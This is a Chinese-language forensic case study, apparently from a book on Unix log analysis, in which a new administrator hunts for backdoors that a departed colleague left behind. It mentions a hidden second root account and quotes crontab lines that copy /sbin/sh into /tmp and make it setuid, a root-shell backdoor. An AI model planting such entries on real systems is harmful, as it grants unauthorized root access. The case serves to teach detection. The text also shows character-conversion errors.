真假Root賬號

真假

root

賬號

本案例**於《unix/linux網路日誌分析與流量監控》一書，主要講述了新老管理員在unix伺服器交接時，新任管理員發現了系統的passwd、shadow均被修改，隨後管理員開始深入調查，更多的問題浮出水面，到底那台伺服器被做過什麼「手腳」呢？

難度係數：★★★★

故事人物：趙雲（新任管理員）曉東（離職管理員）

下面這個例子為大家介紹了國內一家大型生物製藥公司，該公司業務系統主要以unix/linxu系統為主，資訊部系統管理員離職後給公司帶來的困擾問題，其中有技術問題，同時也有管理問題。

事件背景

某日，王經理就收到了資訊部系統管理員曉東的離職信，理由簡單到他都想不到，後來得知他去了公司的競爭對手那裡從事系統管理。這時，王經理讓新來的管理員趙雲，去做好交接工作。

整個交接，非常順利，也很愉快。同時給新網管已到密令--讓他查詢系統是否有後門或漏洞。逐一清理查詢問題，在眾多的unix伺服器和windows伺服器裡確實是一件難事。

下面遇到的問題就是對重要unix伺服器查詢出的問題。首先趙雲從終端登入系統，以便記錄這台計算機上所有的擊鍵，並把它們記錄到乙個日誌檔案中以備以後的分析。趙雲心裡知道用乙個普通使用者的賬號不可能做很多事，所以他想先檢視一些系統重啟後容易丟失的資料。

這是他觀察到上圖中紅色框中的檔案，很顯然被修改過，不時冒出一頭冷汗，難道會在系統中新增其他賬號，如果有另乙個root存在，那系統安全可就保不住了。

趙雲立即意識到這個系統可能存在乙個，也可能是兩個後門，他決定著手把它們都逐一挖掘出來。

他先把這個後門放在一邊，然後從乙個遠端的主機與它進行連線。

很快第2個root賬號很快就被發現了，但是很容易被忽視，這時他決定將注意力集中在對crontab的神秘的修改—上：

# exporteditor=vi

# crontab -eroot

30 1 * * 0 cp/sbin/sh /tmp/tmp1138

31 1 * * 0 chmodu+s /tmp/tmp1138

看來有人想在/tmp目錄下留乙個root shell ，他猜想這個系統中還有其他賬號。